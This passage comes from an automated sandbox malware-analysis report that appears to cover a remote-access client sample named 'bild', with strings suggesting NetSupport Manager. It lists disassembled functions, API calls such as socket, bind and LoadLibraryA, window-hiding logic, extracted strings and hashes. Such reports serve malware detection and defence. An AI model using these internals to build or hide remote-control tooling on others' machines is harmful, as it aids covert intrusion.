                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: _fgets_strpbrk$ErrorLastSleep__wcstoui64
                                                                                                      • String ID: %c%04d%s$%s.%04d.%s$/- $?expirY$?starT$ACM$Client$Expired$_License$_checksum$_include$_version$cd_install$defaults$enforce$expiry$inactive$licensee$product$shrink_wrap$start
                                                                                                      • API String ID: 716802716-1571441106
                                                                                                      • Opcode ID: 32dce6010c3087015648dbee5c865c0eda81171851eef29cc693b610d01e18e4
                                                                                                      • Instruction ID: 9b454a0e08db4b844aa329f9a873b431930d9d904307df7fc69ae15b9a8492e5
                                                                                                      • Opcode Fuzzy Hash: 32dce6010c3087015648dbee5c865c0eda81171851eef29cc693b610d01e18e4
                                                                                                      • Instruction Fuzzy Hash: 55A2D375E0461A9FEB21CF64CC80BEFB7B9AF44345F0041D9E849A7281EB71AA45CF61

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 1921 11143570-111435b1 GetModuleFileNameA 1922 111435f3 1921->1922 1923 111435b3-111435c6 call 11081b40 1921->1923 1925 111435f9-111435fd 1922->1925 1923->1922 1932 111435c8-111435f1 LoadLibraryA 1923->1932 1927 111435ff-1114360c LoadLibraryA 1925->1927 1928 11143619-11143637 GetModuleHandleA GetProcAddress 1925->1928 1927->1928 1929 1114360e-11143616 LoadLibraryA 1927->1929 1930 11143647-11143670 GetProcAddress * 4 1928->1930 1931 11143639-11143645 1928->1931 1929->1928 1933 11143673-111436eb GetProcAddress * 10 call 11161d01 1930->1933 1931->1933 1932->1925 1935 111436f0-111436f3 1933->1935
                                                                                                      APIs
                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,8504C483,74DF23A0), ref: 111435A3
                                                                                                      • LoadLibraryA.KERNEL32(?), ref: 111435EC
                                                                                                      • LoadLibraryA.KERNEL32(DBGHELP.DLL), ref: 11143605
                                                                                                      • LoadLibraryA.KERNEL32(IMAGEHLP.DLL), ref: 11143614
                                                                                                      • GetModuleHandleA.KERNEL32(?), ref: 1114361A
                                                                                                      • GetProcAddress.KERNEL32(00000000,SymGetLineFromAddr), ref: 1114362E
                                                                                                      • GetProcAddress.KERNEL32(00000000,SymGetLineFromName), ref: 1114364D
                                                                                                      • GetProcAddress.KERNEL32(00000000,SymGetLineNext), ref: 11143658
                                                                                                      • GetProcAddress.KERNEL32(00000000,SymGetLinePrev), ref: 11143663
                                                                                                      • GetProcAddress.KERNEL32(00000000,SymMatchFileName), ref: 1114366E
                                                                                                      • GetProcAddress.KERNEL32(00000000,StackWalk), ref: 11143679
                                                                                                      • GetProcAddress.KERNEL32(00000000,SymCleanup), ref: 11143684
                                                                                                      • GetProcAddress.KERNEL32(00000000,SymLoadModule), ref: 1114368F
                                                                                                      • GetProcAddress.KERNEL32(00000000,SymInitialize), ref: 1114369A
                                                                                                      • GetProcAddress.KERNEL32(00000000,SymGetOptions), ref: 111436A5
                                                                                                      • GetProcAddress.KERNEL32(00000000,SymSetOptions), ref: 111436B0
                                                                                                      • GetProcAddress.KERNEL32(00000000,SymGetModuleInfo), ref: 111436BB
                                                                                                      • GetProcAddress.KERNEL32(00000000,SymGetSymFromAddr), ref: 111436C6
                                                                                                      • GetProcAddress.KERNEL32(00000000,SymFunctionTableAccess), ref: 111436D1
                                                                                                      • GetProcAddress.KERNEL32(00000000,MiniDumpWriteDump), ref: 111436DC
                                                                                                        • Part of subcall function 11081B40: _strrchr.LIBCMT ref: 11081B4E
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$LibraryLoad$Module$FileHandleName_strrchr
                                                                                                      • String ID: DBGHELP.DLL$IMAGEHLP.DLL$MiniDumpWriteDump$StackWalk$SymCleanup$SymFunctionTableAccess$SymGetLineFromAddr$SymGetLineFromName$SymGetLineNext$SymGetLinePrev$SymGetModuleInfo$SymGetOptions$SymGetSymFromAddr$SymInitialize$SymLoadModule$SymMatchFileName$SymSetOptions$dbghelp.dll
                                                                                                      • API String ID: 3874234733-2061581830
                                                                                                      • Opcode ID: cfe4e0547bd5fe59c7f15dfeaa5816d95d94d48cef7707ac470bf4deacf2edb6
                                                                                                      • Instruction ID: 707b91cc949213dae1a505c6abf15ec2f20ed18dfa7402eb99b54f6ccfa65761
                                                                                                      • Opcode Fuzzy Hash: cfe4e0547bd5fe59c7f15dfeaa5816d95d94d48cef7707ac470bf4deacf2edb6
                                                                                                      • Instruction Fuzzy Hash: 05411B70A04714AFD7309F768D84A6BFAF8BF55A04B10492EE496D3A10EBB5E8008F5D

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 1936 6c75a980-6c75a9e7 call 6c755840 1939 6c75a9ed-6c75a9f0 1936->1939 1940 6c75aa9c 1936->1940 1939->1940 1942 6c75a9f6-6c75a9fb 1939->1942 1941 6c75aaa2-6c75aaae 1940->1941 1943 6c75aac6-6c75aacd 1941->1943 1944 6c75aab0-6c75aac5 call 6c7728e1 1941->1944 1942->1940 1945 6c75aa01-6c75aa06 1942->1945 1947 6c75aacf-6c75aad7 1943->1947 1948 6c75ab48-6c75ab58 socket 1943->1948 1945->1940 1946 6c75aa0c-6c75aa21 EnterCriticalSection 1945->1946 1950 6c75aa23-6c75aa2b 1946->1950 1951 6c75aa89-6c75aa9a LeaveCriticalSection 1946->1951 1947->1948 1952 6c75aad9-6c75aadc 1947->1952 1953 6c75ab70-6c75abc9 #21 * 2 call 6c755e90 1948->1953 1954 6c75ab5a-6c75ab6f WSAGetLastError call 6c7728e1 1948->1954 1957 6c75aa30-6c75aa39 1950->1957 1951->1941 1952->1948 1958 6c75aade-6c75ab05 call 6c75a5c0 1952->1958 1965 6c75abe8-6c75ac1f bind 1953->1965 1966 6c75abcb-6c75abe3 #21 1953->1966 1961 6c75aa49-6c75aa51 1957->1961 1962 6c75aa3b-6c75aa3f 1957->1962 1973 6c75ab0b-6c75ab2f WSAGetLastError call 6c7530a0 1958->1973 1974 6c75ad4a-6c75ad69 EnterCriticalSection 1958->1974 1961->1957 1969 6c75aa53-6c75aa5e LeaveCriticalSection 1961->1969 1962->1961 1967 6c75aa41-6c75aa47 1962->1967 1970 6c75ac41-6c75ac49 1965->1970 1971 6c75ac21-6c75ac40 WSAGetLastError closesocket call 6c7728e1 1965->1971 1966->1965 1967->1961 1972 6c75aa60-6c75aa88 LeaveCriticalSection call 6c7728e1 1967->1972 1969->1941 1980 6c75ac59-6c75ac64 1970->1980 1981 6c75ac4b-6c75ac57 1970->1981 1987 6c75ae82-6c75ae92 call 6c7728e1 1973->1987 1990 6c75ab35-6c75ab47 call 6c7728e1 1973->1990 1975 6c75ae50-6c75ae80 LeaveCriticalSection GetTickCount InterlockedExchange 1974->1975 1976 6c75ad6f-6c75ad7d 1974->1976 1975->1987 1982 6c75ad80-6c75ad86 1976->1982 1986 6c75ac65-6c75ac83 htons WSASetBlockingHook call 6c757610 1980->1986 1981->1986 1988 6c75ad97-6c75ae0f InitializeCriticalSection call 6c758fb0 call 6c770ef0 1982->1988 1989 6c75ad88-6c75ad90 1982->1989 1996 6c75ac88-6c75ac8d 1986->1996 2011 6c75ae11 1988->2011 2012 6c75ae18-6c75ae4b getsockname 1988->2012 1989->1982 1993 6c75ad92 1989->1993 1993->1975 2000 6c75acc6-6c75accd 1996->2000 2001 6c75ac8f-6c75acc5 WSAGetLastError WSAUnhookBlockingHook closesocket call 6c7530a0 call 6c7728e1 1996->2001 2002 6c75ad45 WSAUnhookBlockingHook 2000->2002 2003 6c75accf-6c75acd6 2000->2003 2002->1974 2003->2002 2007 6c75acd8-6c75acfb call 6c75a5c0 2003->2007 2007->2002 2015 6c75acfd-6c75ad2c WSAGetLastError WSAUnhookBlockingHook closesocket call 6c7530a0 2007->2015 2011->2012 2012->1975 2015->1987 2018 6c75ad32-6c75ad44 call 6c7728e1 2015->2018
                                                                                                      APIs
                                                                                                        • Part of subcall function 6C755840: inet_ntoa.WSOCK32(00000080,?,00000000,?,6C758F91,00000000,00000000,6C79B8DA,?,00000080), ref: 6C755852
                                                                                                      • EnterCriticalSection.KERNEL32(6C79B898,?,00000000,00000000), ref: 6C75AA11
                                                                                                      • LeaveCriticalSection.KERNEL32(6C79B898), ref: 6C75AA58
                                                                                                      • LeaveCriticalSection.KERNEL32(6C79B898), ref: 6C75AA68
                                                                                                      • LeaveCriticalSection.KERNEL32(6C79B898), ref: 6C75AA94
                                                                                                      • WSAGetLastError.WSOCK32(?,?,?,?,?,00000000,00000000), ref: 6C75AB0B
                                                                                                      • socket.WSOCK32(00000002,00000001,00000000,?,00000000,00000000), ref: 6C75AB4E
                                                                                                      • WSAGetLastError.WSOCK32(00000002,00000001,00000000,?,00000000,00000000), ref: 6C75AB5A
                                                                                                      • #21.WSOCK32(00000000,0000FFFF,00001001,?,00000004,00000002,00000001,00000000,?,00000000,00000000), ref: 6C75AB8E
                                                                                                      • #21.WSOCK32(00000000,0000FFFF,00000080,?,00000004,00000000,0000FFFF,00001001,?,00000004,00000002,00000001,00000000,?,00000000,00000000), ref: 6C75ABB1
                                                                                                      • #21.WSOCK32(00000000,00000006,00000001,?,00000004,00000002,00000001,00000000,?,00000000,00000000), ref: 6C75ABE3
                                                                                                      • bind.WSOCK32(00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C75AC18
                                                                                                      • WSAGetLastError.WSOCK32(00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C75AC21
                                                                                                      • closesocket.WSOCK32(00000000,00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C75AC29
                                                                                                      • htons.WSOCK32(00000000,00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C75AC65
                                                                                                      • WSASetBlockingHook.WSOCK32(6C7563A0,00000000,00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C75AC76
                                                                                                      • WSAGetLastError.WSOCK32(00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C75AC8F
                                                                                                      • WSAUnhookBlockingHook.WSOCK32(00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C75AC96
                                                                                                      • closesocket.WSOCK32(00000000,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C75AC9C
                                                                                                      • WSAGetLastError.WSOCK32(?,?,?,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C75ACFD
                                                                                                      • WSAUnhookBlockingHook.WSOCK32(?,?,?,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C75AD04
                                                                                                      • closesocket.WSOCK32(00000000,?,?,?,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C75AD0A
                                                                                                      • WSAUnhookBlockingHook.WSOCK32(00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C75AD45
                                                                                                      • EnterCriticalSection.KERNEL32(6C79B898,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6C75AD4F
                                                                                                      • InitializeCriticalSection.KERNEL32(-6C79CB4A), ref: 6C75ADE6
                                                                                                        • Part of subcall function 6C758FB0: _memset.LIBCMT ref: 6C758FE4
                                                                                                        • Part of subcall function 6C758FB0: getsockname.WSOCK32(?,?,00000010,?,02F52EE8,?), ref: 6C759005
                                                                                                      • getsockname.WSOCK32(00000000,?,?), ref: 6C75AE4B
                                                                                                      • LeaveCriticalSection.KERNEL32(6C79B898), ref: 6C75AE60
                                                                                                      • GetTickCount.KERNEL32 ref: 6C75AE6C
                                                                                                      • InterlockedExchange.KERNEL32(?,00000000), ref: 6C75AE7A
                                                                                                      Strings
                                                                                                      • Connect error to %s using hijacked socket, error %d, xrefs: 6C75AB17
                                                                                                      • Cannot connect to gateway %s via web proxy, error %d, xrefs: 6C75AD14
                                                                                                      • *TcpNoDelay, xrefs: 6C75ABB8
                                                                                                      • Cannot connect to gateway %s, error %d, xrefs: 6C75ACA6
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3511114217.000000006C751000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C750000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3511098641.000000006C750000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511143904.000000006C790000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511160154.000000006C799000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511174105.000000006C79A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511174105.000000006C79E000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511206673.000000006C7A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_6c750000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CriticalSection$ErrorLast$BlockingHookLeave$Unhookclosesocket$Entergetsockname$CountExchangeInitializeInterlockedTick_memsetbindhtonsinet_ntoasocket
                                                                                                      • String ID: *TcpNoDelay$Cannot connect to gateway %s via web proxy, error %d$Cannot connect to gateway %s, error %d$Connect error to %s using hijacked socket, error %d
                                                                                                      • API String ID: 692187944-2561115898
                                                                                                      • Opcode ID: bb196d9473ddcc684f750524601db118b766fb1e89d3ee584386b9dd7b5a0e66
                                                                                                      • Instruction ID: f65633ec800f2b97ce47563587cfe61bbe442d0700f85b4ff10d7076b3dc3663
                                                                                                      • Opcode Fuzzy Hash: bb196d9473ddcc684f750524601db118b766fb1e89d3ee584386b9dd7b5a0e66
                                                                                                      • Instruction Fuzzy Hash: DEE1A171A002189FDB24DF58DA49BEDB3B5FF48314F5041BAE90DA7780DB709A58CBA1

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 2087 11139090-111390c5 2088 111390d2-111390d9 2087->2088 2089 111390c7-111390cd GetCurrentThreadId 2087->2089 2090 111390e0-111390fc call 11133920 call 11133400 2088->2090 2091 111390db call 11029330 2088->2091 2089->2088 2097 11139102-11139108 2090->2097 2098 111391db-111391e2 2090->2098 2091->2090 2099 1113975a-11139775 call 11161d01 2097->2099 2100 1113910e-1113916f call 11138c30 IsWindow IsWindowVisible call 11146450 call 1105dd10 IsWindowVisible 2097->2100 2101 1113929a-111392b0 2098->2101 2102 111391e8-111391ef 2098->2102 2140 111391d1 2100->2140 2141 11139171-11139177 2100->2141 2110 111392b6-111392bd 2101->2110 2111 111393ef 2101->2111 2102->2101 2105 111391f5-111391fc 2102->2105 2105->2101 2108 11139202-11139211 FindWindowA 2105->2108 2108->2101 2113 11139217-1113921c IsWindowVisible 2108->2113 2115 111392bf-111392c9 2110->2115 2116 111392ce-111392ee call 1105dd10 2110->2116 2117 111393f1-11139402 2111->2117 2118 11139435-11139440 2111->2118 2113->2101 2114 1113921e-11139225 2113->2114 2114->2101 2120 11139227-1113924c call 11138c30 IsWindowVisible 2114->2120 2115->2118 2116->2118 2137 111392f4-11139323 2116->2137 2122 11139404-11139414 2117->2122 2123 1113941a-1113942f 2117->2123 2124 11139442-11139462 call 1105dd10 2118->2124 2125 11139476-1113947c 2118->2125 2120->2101 2143 1113924e-1113925d IsIconic 2120->2143 2122->2123 2123->2118 2146 11139470 2124->2146 2147 11139464-1113946e call 1102cff0 2124->2147 2127 1113947e-1113948a call 11138c30 2125->2127 2128 1113948d-11139495 2125->2128 2127->2128 2135 111394a7 2128->2135 2136 11139497-111394a2 call 1106b860 2128->2136 2145 111394a7 call 1112ce90 2135->2145 2136->2135 2156 11139325-11139339 call 11081a70 2137->2156 2157 1113933e-11139351 call 11143230 2137->2157 2140->2098 2141->2140 2148 11139179-11139190 call 11146450 GetForegroundWindow 2141->2148 2143->2101 2150 1113925f-1113927a GetForegroundWindow call 11131210 * 2 2143->2150 2152 111394ac-111394b2 2145->2152 2146->2125 2147->2125 2161 11139192-111391bc EnableWindow call 11131210 * 2 EnableWindow 2148->2161 2162 111391be-111391c0 2148->2162 2195 1113928b-11139294 EnableWindow 2150->2195 2196 1113927c-11139282 2150->2196 2158 111394b4-111394ba call 11131b00 2152->2158 2159 111394bd-111394c6 2152->2159 2156->2157 2183 1113933b 2156->2183 2184 11139353-11139364 GetLastError call 11146450 2157->2184 2185 1113936e-11139375 2157->2185 2158->2159 2167 111394d4 call 111317a0 2159->2167 2168 111394c8-111394cb 2159->2168 2161->2162 2162->2140 2171 111391c2-111391c8 2162->2171 2176 111394d9-111394df 2167->2176 2168->2176 2177 111394cd-111394d2 call 11131870 2168->2177 2171->2140 2181 111391ca-111391cb SetForegroundWindow 2171->2181 2179 111394e5-111394eb 2176->2179 2180 111395e9-111395f4 call 111386b0 2176->2180 2177->2176 2192 111394f1-111394f9 2179->2192 2193 1113959b-111395a3 2179->2193 2205 111395f6-11139608 call 110637c0 2180->2205 2206 11139615-1113961b 2180->2206 2181->2140 2183->2157 2184->2185 2189 11139377-11139392 2185->2189 2190 111393e8 2185->2190 2203 11139395-111393a1 2189->2203 2190->2111 2192->2180 2199 111394ff-11139505 2192->2199 2193->2180 2202 111395a5-111395e3 call 1103f000 call 1103f040 call 1103f060 call 1103f020 call 1110f270 2193->2202 2195->2101 2196->2195 2201 11139284-11139285 SetForegroundWindow 2196->2201 2199->2180 2204 1113950b-11139522 call 1110f420 2199->2204 2201->2195 2202->2180 2210 111393a3-111393b7 call 11081a70 2203->2210 2211 111393bc-111393c9 call 11143230 2203->2211 2224 11139544 2204->2224 2225 11139524-11139542 call 110573b0 2204->2225 2205->2206 2227 1113960a-11139610 call 11142210 2205->2227 2208 11139621-11139628 2206->2208 2209 1113974a-11139752 2206->2209 2208->2209 2216 1113962e-11139647 call 1105dd10 2208->2216 2209->2099 2210->2211 2230 111393b9 2210->2230 2211->2190 2232 111393cb-111393e6 GetLastError call 11146450 2211->2232 2216->2209 2236 1113964d-11139660 2216->2236 2233 11139546-11139592 call 1110f260 call 1104ce00 call 1104e340 call 1104e3b0 call 1104ce40 2224->2233 2225->2233 2227->2206 2230->2211 2232->2118 2233->2180 2267 11139594-11139599 call 110ebf30 2233->2267 2248 11139662-11139668 2236->2248 2249 1113968d-11139693 2236->2249 2252 1113966a-11139688 call 11146450 GetTickCount 2248->2252 2253 11139699-111396a5 GetTickCount 2248->2253 2249->2209 2249->2253 2252->2209 2253->2209 2256 111396ab-111396eb call 11142e80 call 11146ee0 call 11142e80 call 11025bb0 2253->2256 2273 111396f0-111396f5 2256->2273 2267->2180 2273->2273 2274 111396f7-111396fd 2273->2274 2275 11139700-11139705 2274->2275 2275->2275 2276 11139707-11139731 call 1112c7a0 2275->2276 2279 11139733-11139734 FreeLibrary 2276->2279 2280 1113973a-11139747 call 111618c1 2276->2280 2279->2280 2280->2209
                                                                                                      APIs
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 111390C7
                                                                                                      • IsWindow.USER32(00020456), ref: 11139125
                                                                                                      • IsWindowVisible.USER32(00020456), ref: 11139133
                                                                                                      • IsWindowVisible.USER32(00020456), ref: 1113916B
                                                                                                      • GetForegroundWindow.USER32 ref: 11139186
                                                                                                      • EnableWindow.USER32(00020456,00000000), ref: 111391A0
                                                                                                      • EnableWindow.USER32(00020456,00000001), ref: 111391BC
                                                                                                      • SetForegroundWindow.USER32(00000000), ref: 111391CB
                                                                                                      • FindWindowA.USER32(Shell_TrayWnd,00000000), ref: 11139209
                                                                                                      • IsWindowVisible.USER32(00000000), ref: 11139218
                                                                                                      • IsWindowVisible.USER32(00020456), ref: 11139248
                                                                                                      • IsIconic.USER32(00020456), ref: 11139255
                                                                                                      • GetForegroundWindow.USER32 ref: 1113925F
                                                                                                        • Part of subcall function 11131210: ShowWindow.USER32(00020456,00000000,?,11139062,00000007,?,?,?,?,?,00000000), ref: 11131234
                                                                                                        • Part of subcall function 11131210: ShowWindow.USER32(00020456,11139062,?,11139062,00000007,?,?,?,?,?,00000000), ref: 11131246
                                                                                                      • SetForegroundWindow.USER32(00000000), ref: 11139285
                                                                                                      • EnableWindow.USER32(00020456,00000001), ref: 11139294
                                                                                                      • GetLastError.KERNEL32 ref: 11139353
                                                                                                      • GetLastError.KERNEL32 ref: 111393CB
                                                                                                      • GetTickCount.KERNEL32 ref: 11139678
                                                                                                      • GetTickCount.KERNEL32 ref: 11139699
                                                                                                        • Part of subcall function 11025BB0: LoadLibraryA.KERNEL32(Wtsapi32.dll,00000000,111396E2), ref: 11025BB8
                                                                                                      • FreeLibrary.KERNEL32(?,00000000,000000FF,00000000,00000001,00000000,00000001,00000000,0000000A,?,00000000), ref: 11139734
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Window$ForegroundVisible$Enable$CountErrorLastLibraryShowTick$CurrentFindFreeIconicLoadThread
                                                                                                      • String ID: Audio$Client$File <%s> doesnt exist, e=%d$HideWhenIdle$HookDirectSound$MainWnd = %08x, visible %d, valid %d$NeedsReinstall$Reactivate main window$Shell_TrayWnd$ShowNeedsReinstall in 15, user=%s$disableRunplugin
                                                                                                      • API String ID: 2511061093-2542869446
                                                                                                      • Opcode ID: 0e4ccee009b06b63fab7a686928084bc30871ce576c3106fc105d812773a0109
                                                                                                      • Instruction ID: 168a4b77644d94df8a921335772b55db7e1a21360cf08f879ca3086e41f0bcfd
                                                                                                      • Opcode Fuzzy Hash: 0e4ccee009b06b63fab7a686928084bc30871ce576c3106fc105d812773a0109
                                                                                                      • Instruction Fuzzy Hash: 700229B8A1062ADFE716DFA4CDD4B6AF766BBC071EF500178E4255728CEB30A844CB51
                                                                                                      APIs
                                                                                                      • #16.WSOCK32(00000000,?,a3vl,00000000,00000000,?,00000007), ref: 6C75924C
                                                                                                      • WSAGetLastError.WSOCK32(00000000,?,a3vl,00000000,00000000,?,00000007), ref: 6C75925B
                                                                                                      • GetTickCount.KERNEL32 ref: 6C759274
                                                                                                      • Sleep.KERNEL32(00000001,00000000,?,a3vl,00000000,00000000,?,00000007), ref: 6C7592A8
                                                                                                      • GetTickCount.KERNEL32 ref: 6C7592B0
                                                                                                      • Sleep.KERNEL32(00000014), ref: 6C7592BC
                                                                                                      Strings
                                                                                                      • ReadSocket - Error %d reading response, xrefs: 6C7592F7
                                                                                                      • a3vl, xrefs: 6C759244
                                                                                                      • hbuf->buflen - hbuf->datalen >= min_bytes_to_read, xrefs: 6C75922B
                                                                                                      • ReadSocket - Would block, xrefs: 6C75928A
                                                                                                      • *RecvTimeout, xrefs: 6C75927B
                                                                                                      • ReadSocket - Connection has been closed by peer, xrefs: 6C7592E0
                                                                                                      • e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c, xrefs: 6C759226
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3511114217.000000006C751000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C750000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3511098641.000000006C750000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511143904.000000006C790000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511160154.000000006C799000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511174105.000000006C79A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511174105.000000006C79E000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511206673.000000006C7A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_6c750000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CountSleepTick$ErrorLast
                                                                                                      • String ID: *RecvTimeout$ReadSocket - Connection has been closed by peer$ReadSocket - Error %d reading response$ReadSocket - Would block$a3vl$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c$hbuf->buflen - hbuf->datalen >= min_bytes_to_read
                                                                                                      • API String ID: 2495545493-3291685314
                                                                                                      • Opcode ID: 8de646459f04c3afa92be1dd92c4f2934ec56174e5f865edfc1c99a698fd6489
                                                                                                      • Instruction ID: 304e841378ed1a865b642bd57d3ad1463ff22aeeb70b3c74ec4134a70167787b
                                                                                                      • Opcode Fuzzy Hash: 8de646459f04c3afa92be1dd92c4f2934ec56174e5f865edfc1c99a698fd6489
